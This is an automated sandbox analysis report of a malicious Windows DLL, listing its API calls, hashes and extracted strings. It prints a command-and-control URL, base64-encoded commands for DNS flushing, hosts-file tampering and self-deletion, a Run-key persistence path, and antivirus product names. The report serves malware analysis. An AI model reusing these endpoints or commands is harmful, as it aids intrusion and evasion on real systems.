Sleep 30080->30082 30083 1000400a GetDriveTypeA 30080->30083 30082->30080 30083->30080 30084 1002875f 30085 1001d84c 30084->30085 30085->30084 30086 10008817 30085->30086 30088 1002e497 30085->30088 30087 10001000 6 API calls 30086->30087 30094 1003591b 30086->30094 30089 1000883e wsprintfA 30087->30089 30096 10008817 10 API calls 30088->30096 30091 1000885e 30089->30091 30092 10008863 Sleep 30091->30092 30093 10008876 30091->30093 30092->30093 30094->30094 30095 10039171 30096->30095 30097 1003281c 30103 10034abc 30097->30103 30099 10032824 CreateThread 30100 10032829 30099->30100 30107 1001eff2 6 API calls 30100->30107 30105 1002829b 30103->30105 30104 1003849b 30104->30099 30105->30099 30105->30104 30108 10023b24 6 API calls 30105->30108 30108->30103 30223 10008bbf 30224 10008bd8 30223->30224 30225 10008c23 30224->30225 30227 1001e698 6 API calls 30224->30227 30227->30225
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
• Opcode ID: 82b719074b20f935b89b24443a0030266dafc30d3af0f45e12e33eda6027182c
• Instruction ID: 64991af82c4176b47a5b2112c671631c23c979084c56eaaf7cabcf31d5835ef9
• Opcode Fuzzy Hash: 82b719074b20f935b89b24443a0030266dafc30d3af0f45e12e33eda6027182c
• Instruction Fuzzy Hash: 13B00872519392ABDF02DF91CD4482ABAA6BB88301F084C5CF2A541071C7328428EB02
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,10005943,00000002,00000000,00000000,00000000), ref: 10003FBF
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: CreateSnapshotToolhelp32
• String ID:
• API String ID: 3332741929-0
• Opcode ID: bb66744035d4238db38a1512a5e6e8de47de2053b5e9d82f09d1f961b31b016d
• Instruction ID: 5009357eb275d1e5704b6a5f64a804a4966702db517f425a36799c0ea53529f5
• Opcode Fuzzy Hash: bb66744035d4238db38a1512a5e6e8de47de2053b5e9d82f09d1f961b31b016d
• Instruction Fuzzy Hash: F5A00275404211BBDA415B50CD44D4ABF61BB98741F01C415F19540034C73585A5DB11
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5dc9b721b54175916c357d909f3d1dbecb839da25cfc785ff06387120204b24
• Instruction ID: 93a0378a6ccf2f7f519dd23e519065d15f3c4302ed09a0acca3509da98e3dc9f
• Opcode Fuzzy Hash: c5dc9b721b54175916c357d909f3d1dbecb839da25cfc785ff06387120204b24
• Instruction Fuzzy Hash: 3CF0366229E3C26EE31287285841BD6FF956B76314F0CCBCDB1D81B283C1E58498C7B6

Control-flow Graph

APIs
• Sleep.KERNEL32(0000EA60), ref: 10006F47
• Sleep.KERNEL32 ref: 1000707C
• wsprintfA.USER32 ref: 100070C0
• PrintFile.2JSGOLBNYM(00000000,?,00000000), ref: 100070F9
• PrintFile.2JSGOLBNYM(00000000,?,00000000,?,00000000), ref: 1000710C
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: FilePrintSleep$wsprintf
• String ID: QVNEU3ZjLmV4ZQ==$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
• API String ID: 1547040302-3558339448
• Opcode ID: 898088f43af6ae26a71cb29de304709aace19cb9a3dbecf7e56f820a126de524
• Instruction ID: fb61bf4e8c3f987df104399158fbbd5fa82b7bd29b5b13544636659ff5ce8687
• Opcode Fuzzy Hash: 898088f43af6ae26a71cb29de304709aace19cb9a3dbecf7e56f820a126de524
• Instruction Fuzzy Hash: 7551D8B6D04359BAF721D764CC55FCE77ACEB08381F2045A1F208AA086DA75BB808E51

Control-flow Graph

APIs
• socket.WS2_32(00000002,00000002,00000000,?,?,00000202,?), ref: 1000499C
• socket.WS2_32(00000002,00000002,00000000), ref: 100049A4
• Sleep.KERNEL32(?,00000000,00000001,00000000,00000000,?), ref: 10004A3A
• wsprintfA.USER32 ref: 10004ADB
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: socket$Sleepwsprintf
                                                                                                                                                                          • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$v3lite
                                                                                                                                                                          • API String ID: 4031334902-4002687564
                                                                                                                                                                          • Opcode ID: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction ID: 59076712db6477dadbaa6102d4b2767c56af3142dc1d583c19f1c191fca588aa
                                                                                                                                                                          • Opcode Fuzzy Hash: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction Fuzzy Hash: 97B16CB2D0025CAAEB11DBE4CC85EDFBBBCEB45740F0045A6F205A6141EA71AB45CF61

Control-flow Graph

APIs
• wsprintfA.USER32 ref: 10006509
  • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
• ___crtGetTimeFormatEx.LIBCMT ref: 10006558
  • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
  • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065DA
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065F8
• wsprintfA.USER32 ref: 100066FB
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
• String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
• API String ID: 4077377486-2496724313

Control-flow Graph

APIs
• ___crtGetTimeFormatEx.LIBCMT ref: 10005E23
  • Part of subcall function 1000409D: RegQueryValueExA.KERNEL32(000000C8,00000004,?,?,?,?,-00000018,10005E28,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094), ref: 100040B2
  • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094,00000000,000F003F,-0000001C,00000000,00000000), ref: 10004096
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: CloseFormatQueryTimeValue___crt
• String ID: %u MB$12091507$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
• API String ID: 271660946-2089455369

Control-flow Graph

APIs
  • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
  • Part of subcall function 1000406C: RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D83,?,10006D83,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
• wsprintfA.USER32 ref: 10006DAB
• ___crtGetTimeFormatEx.LIBCMT ref: 10006DD1
  • Part of subcall function 100040D4: RegSetValueExA.KERNEL32(00000001,?,00000001,00000000,?,?,?,10006DD6,?,COAPI,00000000,00000001,?,00000001,?), ref: 100040E9
  • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094,00000000,000F003F,-0000001C,00000000,00000000), ref: 10004096
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
• String ID: %s "%s",ClassObject$C:\Users\user\Desktop\2JSGOlbNym.dll$C:\Windows\SysWOW64\rundll32.exe$COAPI$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
• API String ID: 1762869224-3236236931

Control-flow Graph

APIs
Strings
• XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082FF
• Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008428
• 127.0.0.1, xrefs: 10008417
• http://107.163.56.232:18963/main.php, xrefs: 10008376
• 8.8.8.8, xrefs: 10008412
• XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082E8
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
• API String ID: 1749205058-515792873

Control-flow Graph (image)
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Memory Dump Source
• Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: 7$C:\Users\user\Desktop$SK$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
• API String ID: 1749205058-2043548083
• Opcode ID: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
• Instruction ID: 71c666905a5763b167ab1a21182f42240e287b7e11d47a96cc59b11d17f26c76
• Opcode Fuzzy Hash: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
• Instruction Fuzzy Hash: 4731F571408284AED712EB10DC8669E7FA6EF84385F50886DFAC85B112C770A9A49B53

Control-flow Graph (image)
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep$wsprintf
• String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log
• API String ID: 3195947292-1533272838
• Opcode ID: a1878e512939dc9aed6c6a2808bc6b3174a4810047bc271b34a995d0e4e84be8
• Instruction ID: acd8b216c9490be150f41627fddde4231ced29d76843988cf1697fe551d5a772
• Opcode Fuzzy Hash: a1878e512939dc9aed6c6a2808bc6b3174a4810047bc271b34a995d0e4e84be8
• Instruction Fuzzy Hash: 0D21A17680021CBAEB11DBE48C85EDFBB7DEF08390F140466F604B6141EA756A858BA1

Control-flow Graph (image)
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: strcspn$FormatTime___crt
• String ID: http://
• API String ID: 4006067733-1121587658
• Opcode ID: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
• Instruction ID: 5e5274a5df46717633dbefa534eebea5f36de8a9ab4d0e8209e5c86ee6f0ed2e
• Opcode Fuzzy Hash: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
• Instruction Fuzzy Hash: 6541457690421CBAEF11DBB4DC85FDE77BCDF08394F5004A6F608E6082DA75AF458AA1

Control-flow Graph (image)
APIs
  • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006AC6,00000000,00000000,0x5d65r455f,?,00000202,?), ref: 10003EDA
• GetLastError.KERNEL32 ref: 10006ACB
  • Part of subcall function 100064AB: wsprintfA.USER32 ref: 10006509
  • Part of subcall function 100064AB: ___crtGetTimeFormatEx.LIBCMT ref: 10006558
• Sleep.KERNEL32(0002BF20), ref: 10006B00
• CreateThread.KERNEL32(00000000,00000000,Function_00006890,00000000,00000000,00000000), ref: 10006B14
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
• String ID: 0x5d65r455f$5762479093
• API String ID: 3244495550-2446933972
• Opcode ID: 2b6b27ac91e41062734f3373b3ae15d3a14cdbb1e032772f862c600bebe40acc
• Instruction ID: 4f67e99d50a46098441a250a8f858ff8eaba0e926cf0b864be99c43c72b3ca27
• Opcode Fuzzy Hash: 2b6b27ac91e41062734f3373b3ae15d3a14cdbb1e032772f862c600bebe40acc
• Instruction Fuzzy Hash: F7014CB69443587AF210E3716CC6DFB3A4CDF953E0F240535FA15950CBDA24AC1581B2

Control-flow Graph (image)
APIs
• Sleep.KERNEL32(000927C0), ref: 100087E8
• CreateThread.KERNEL32(?,?,Function_00006A91), ref: 100087F4
• Sleep.KERNEL32(00001388,?,?,Function_00006A91), ref: 100087FB
• CreateThread.KERNEL32(?,?,1000843F,?,?,?,?,?,Function_00006A91), ref: 10008807
• Sleep.KERNEL32(000000FF), ref: 1000880B
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep$CreateThread
• String ID:
• API String ID: 3220764680-0
• Opcode ID: 538c09f4ca1db9a5df36fbaa0c689abd638c4e70f4fcd7ac301f6431ffc0d22a
• Instruction ID: 4b6e769774edf3c018003931c063b816a823b7adbda171aad520a6a641979407
• Opcode Fuzzy Hash: 538c09f4ca1db9a5df36fbaa0c689abd638c4e70f4fcd7ac301f6431ffc0d22a
• Instruction Fuzzy Hash: F3E017E824435E38B120B3B60CC6CAB1D4CEF806EC3624610F6645108ADE419E089EB1

Control-flow Graph

• Executed
• Not Executed
(Control-flow graph of the function at 100044bf; rendered as an image in the original report, the node and edge data is not reproduced here.)
APIs
• GetExtendedUdpTable.IPHLPAPI(00000000,100152B0,00000001,00000002,00000001,00000000,00000000,00000000,iphlpapi.dll,00000000,cmd.exe,00000000), ref: 100044FB
• GetExtendedUdpTable.IPHLPAPI(00000000,100152B0,00000001,00000002,00000001,00000000), ref: 10004525
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: ExtendedTable
• String ID: cmd.exe$iphlpapi.dll
• API String ID: 2407854163-236925365
• Opcode ID: e2e9211ea7ade89dc831a8659b89218d2b5f251a8e2d1a35f8a9eda1d3166796
• Instruction ID: 365beb789b99603e116b1a1ab9323ed5eb6d4335065ecc84b7a338da563c50e8
• Opcode Fuzzy Hash: e2e9211ea7ade89dc831a8659b89218d2b5f251a8e2d1a35f8a9eda1d3166796
• Instruction Fuzzy Hash: 162104B5D00A04BFEB11DBA89C81DBF77BCEB416D2F218956F451E6186EB30AE408664

Control-flow Graph

• Executed
• Not Executed
(Control-flow graph of the function at 100062a2; rendered as an image in the original report, the node and edge data is not reproduced here.)
APIs
  • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
• ___crtGetTimeFormatEx.LIBCMT ref: 100062D1
  • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: InternetOpen$FormatTime___crt
• String ID: ECF4BB45F69F$TW96aWxsYS80LjAgKGNvbXBhdGlibGUp
• API String ID: 1165476586-1862099156
• Opcode ID: 506d6c5dc250ecec721ffc41dc4442ad077fce6a6201d60bf6a5e6fc8829cee9
• Instruction ID: 21a2c1fa93f4fb8ce2e578520bcd28e6c7ec5b0984b492723eef9b5496b4b71f
• Opcode Fuzzy Hash: 506d6c5dc250ecec721ffc41dc4442ad077fce6a6201d60bf6a5e6fc8829cee9
• Instruction Fuzzy Hash: B6E0D832C089D2357A33E1671C0FD9F0EBDCBC7AE0B31403DF948A100DE856A49280B9

Control-flow Graph

• Executed
• Not Executed
(Control-flow graph of the function at 10007124; rendered as an image in the original report, the node and edge data is not reproduced here.)
APIs
Strings
• http://107.163.56.232:18963/main.php, xrefs: 1000718E
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: http://107.163.56.232:18963/main.php
• API String ID: 1749205058-3919619334
• Opcode ID: b7b88872c4f2ca77bada5b5a446887ac554d5b21e502500d927af6b32f2ca290
• Instruction ID: df85a5c81aedc657149ca01c126d313bee586dbed1d4d3978c6c3ca2ac76a151
• Opcode Fuzzy Hash: b7b88872c4f2ca77bada5b5a446887ac554d5b21e502500d927af6b32f2ca290
• Instruction Fuzzy Hash: B72129B69046567AF710D368CC56FCF369CFF053D0F3000B5F208A50C6EAB9AA804A65
APIs
  • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006AC6,00000000,00000000,0x5d65r455f,?,00000202,?), ref: 10003EDA
• GetLastError.KERNEL32 ref: 10006B78
• CreateThread.KERNEL32(00000000,00000000,Function_00006890,?,00000000,00000000), ref: 10006B8E
• Sleep.KERNEL32(00002710,00000000,00000000,00000000,000000FF), ref: 10006BAB
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$ErrorLastMutexSleepThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 145085098-0
                                                                                                                                                                          • Opcode ID: 6e86dcc16388275b23f5b89f6ec8f8bc150e4405bd4196b84570cd7b60874dbc
                                                                                                                                                                          • Instruction ID: 9023b97c409da10c3b84e885d2ccb2b6484bf3cfa7db22153589a8a7711359b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e86dcc16388275b23f5b89f6ec8f8bc150e4405bd4196b84570cd7b60874dbc
                                                                                                                                                                          • Instruction Fuzzy Hash: 50F09674405264BAE611E7619C8ADFF3E6DDF8A7E4F100124F918A61C6CB64AE4282F6
APIs
Strings
• aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=, xrefs: 100085A3
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep$wsprintf
• String ID: aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=
• API String ID: 3195947292-1577701794
• Opcode ID: 9e786f786539636db66fb15e8139c8f1a863743c9ac7a57a5e3026de646030b2
• Instruction ID: 4a5d728e07750d64c5f5934a383ecd53961408c042992e3cc8f838b67af43ebd
• Opcode Fuzzy Hash: 9e786f786539636db66fb15e8139c8f1a863743c9ac7a57a5e3026de646030b2
• Instruction Fuzzy Hash: 27F0A035C0111CBAFB21ABF58C8AEDF7E69EF043E0F140065F90462144DAB11E8087A1
APIs
  • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
• ___crtGetTimeFormatEx.LIBCMT ref: 10006213
Strings
• TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1, xrefs: 100061E2
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: FormatInternetOpenTime___crt
• String ID: TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1
• API String ID: 483802873-1756078650
• Opcode ID: cef4efffd429ddee3212c6e039c19f196e3efd6be34b444d7ff284c3b8751f5e
• Instruction ID: a5547eeb69050645aed9f260844fde4d5ca2e3288b24f94df7381202492e8511
• Opcode Fuzzy Hash: cef4efffd429ddee3212c6e039c19f196e3efd6be34b444d7ff284c3b8751f5e
• Instruction Fuzzy Hash: 5821C2B5D0024DBAEF11DA55CC85DDF3BBDDB852D4F20806AF608A2045EA30AA918674
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: CreateThread
• String ID: R2V0Q3Vyc29yUG9z
• API String ID: 2422867632-1626527068
• Opcode ID: 07f024186378984c7e9d0841217f5ef98467c514b2f4d500de2484e669f52904
• Instruction ID: 2fbd12757a924457875e578167f5cd40fc8d60cd886180bfe36f56dc21c14199
• Opcode Fuzzy Hash: 07f024186378984c7e9d0841217f5ef98467c514b2f4d500de2484e669f52904
• Instruction Fuzzy Hash: 31E0867A008241AFD326DB80D0C5DCFB7E3FFC5200F549E09B55906209D77461948696
